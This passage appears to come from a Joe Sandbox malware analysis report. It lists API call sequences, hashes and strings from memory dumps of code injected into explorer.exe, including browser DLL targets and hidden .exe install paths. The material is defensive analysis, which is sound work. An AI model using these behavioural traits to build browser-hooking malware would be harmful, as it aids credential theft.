                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: db801ebe3a0ee96db9703523295bbe9f666fd5abff5306abcdbf06096061c05f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0312F71712A85A1EE14DBB6FCA03E92360BB8AB51F184E75CC2A173E0DF3CC8959304
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: f90a3d51fcf4ad181249dedb76805987559b4cae7be70c6065e662673e1850e1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B731C021A16B4791FF35AF51EC903783365BF45F94F580635DD2A86AA2DF7CC046A310
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC31
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC3E
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0DFBA2F9
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0DFBA34E
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0DFBA373
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFBA3CE
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFBA3D7
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: c877b7ebf5a076277a0cb6aabd5b9a9ecb681da6889e265d7469df75222f0100
                                                                                                                                                                                                                        • Instruction ID: c886de4d0237ac99a18e8ea4145a7436aee10a7e92924a95c847769151f4cc7f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c877b7ebf5a076277a0cb6aabd5b9a9ecb681da6889e265d7469df75222f0100
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80519D72708B8295EA21DF5AE8403FA7365F788B94F88C126CE4A47724EFBDC645C750
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC31
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC3E
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0E11A2F9
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0E11A34E
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0E11A373
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E11A3CE
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E11A3D7
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction ID: 325a199ce5c32a09385071d5bc3543741eb2b2aa28bbf5fd4fcd629f667f7c53
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B451947131ABC185EA24DF22E8503DA67A5FB89B80FC84862DE4A57754EF3CCA85C741
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC31
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC3E
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 0FF5A2F9
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 0FF5A34E
                                                                                                                                                                                                                        • malloc.MSVCRT ref: 0FF5A373
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0FF5A3CE
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF5A3D7
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                                        • API String ID: 308684148-2401417439
                                                                                                                                                                                                                        • Opcode ID: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction ID: c3c3e517f5b08758bfc9bad7c4bf873a8f568d4d95d997e3a88d44a136ece2e0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b68e0dd4b4905f2a987690e05f0d669eb600becd0b96a1415015b4546e5f171
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C511821608B8785EA31EF11A8507BAA7A4FF89FC4FC84236CE4A57A15EF3CD156D740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: c99e226cb075efdfdbf0a52de36c47a1dd05dd7b8a07826977679618aaecfa00
                                                                                                                                                                                                                        • Instruction ID: 120913920bb114c48595ab5eaa94a02bc72dddc73ad0c1bfb326cde76390740b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c99e226cb075efdfdbf0a52de36c47a1dd05dd7b8a07826977679618aaecfa00
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88517D76704B9186EB24DF5AE8443AA73A1FB89BD4F04D12ACE4E43B68DF7CC5058B10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction ID: 9cb457e3888555b070ef4b6ff254271fc20fd50b998b618cebf139978fc21324
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57517CB6B05B8086EB24DF16E95439A73A1FB8CBC5F055529CE8E53B58DF7CC9848B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1433255627-0
                                                                                                                                                                                                                        • Opcode ID: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction ID: a601172e27527ad428b6c53f0f2d1fb07276bcbce387375e87c3accb09de8c8c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04027b89da6b9f4f311e5d19a3a4145fe0765d14d29bd0568ddead53d1ed5392
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6515B76704B4286EB24DF26E8443AA73A1FB88FC4F445139CE4A43B59DF3CC54A8B04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction ID: 25e3287869434a33a245a74a34338819e3eaad77a78f42365ccb7ca682642917
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A418932315B8087EB508F26E85476E77A5FB88BD0F114625DE9E53B94EF38C585CB10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction ID: 6113d5506b93936696a975d3792050fefaea5b42b9b739828b95e859a4d95998
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4999e7ccdb6d133b0e9522f9030a530e963fb9a5ffeb94da4667c25ff20d675b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E41C132709B4286DB609F26A84477ABBA4FF89B90F444239DE5E43B54EF3CE045D710
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E109C50: GetWindowsDirectoryW.KERNEL32 ref: 0E109CA3
                                                                                                                                                                                                                          • Part of subcall function 0E109C50: GetVolumeInformationW.KERNEL32 ref: 0E109CF2
                                                                                                                                                                                                                          • Part of subcall function 0E109C50: wsprintfW.USER32 ref: 0E109D54
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0E109DE5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109DF5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E03
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0E109E0E
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0E109E1C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E2C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E3A
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0E109E4A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction ID: 13fc967cfedad4a0eb10470a85911f64da278caf41eb8c55c88bb5896353ab4f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4221F332319B8186EB90DB21F85879D33E1B78DB84F412835DA8E97714EE38C659CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF49C50: GetWindowsDirectoryW.KERNEL32 ref: 0FF49CA3
                                                                                                                                                                                                                          • Part of subcall function 0FF49C50: GetVolumeInformationW.KERNEL32 ref: 0FF49CF2
                                                                                                                                                                                                                          • Part of subcall function 0FF49C50: wsprintfW.USER32 ref: 0FF49D54
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0FF49DE5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49DF5
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E03
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0FF49E0E
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0FF49E1C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E2C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E3A
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0FF49E4A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction ID: e7cb5e40a5fe073552d357e2122305104e2e8b8e835b3ca2fd97fdfbc9fe805d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2465feb47dfbf4e39e3fb636e60b490fb9b3a01f4a1802c0286285fc0bd52c3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7221E432319B4395EBA0EF21FC5876AB3A1BF89744F412035DA9E87B14EF38C1199704
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetWindowsDirectoryA.KERNEL32 ref: 0E109B7C
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetVolumeInformationA.KERNEL32 ref: 0E109BC6
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: wsprintfA.USER32 ref: 0E109C27
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0E109EC3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109ED3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109EE1
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0E109EEC
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0E109EFA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109F0A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109F18
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E109F28
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction ID: c3c916c09b0505ac558ce52322eb5412aeedea5cb41f8b6b7c730188adef59f1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6611F931215B8582EE44DB31F85479AB3A2FB8DB84F446825D98B57728DE7CC255CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetWindowsDirectoryA.KERNEL32 ref: 0FF49B7C
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetVolumeInformationA.KERNEL32 ref: 0FF49BC6
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: wsprintfA.USER32 ref: 0FF49C27
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0FF49EC3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49ED3
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49EE1
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0FF49EEC
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0FF49EFA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49F0A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49F18
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF49F28
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction ID: ff05d62d4830e850e269c2b12bdd233261a5fe358a77e3c7676de30ac87740b0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60a5b1947e9a1e6045203543321f9579d85a40846c9d1738233bd2d77a5d265c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6211E725219B4792EB64AF21FC5477AB3A1FF89B84F446035D98A47B28DF7CC119DB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isprint$strstr
                                                                                                                                                                                                                        • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                        • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                        • Opcode ID: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction ID: e2c6ca75b6be1302a74a50e0a4bb2c6cebf121c1326eb932ee981b32264a7f18
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F41D467608B9485DB21CF29F5803BA77A5F785754F88D22ADE8A43758EB7CC049CB10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isprint$strstr
                                                                                                                                                                                                                        • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                        • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                        • Opcode ID: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction ID: e1b65308d6c2dd7fae130b3e3ed7df2b19645a7de651f1a20177d18ab0b396d9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB41C433308B9485DB25CF21F4903AEB7A5F785754F845626DE8A43798EBBCC595C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
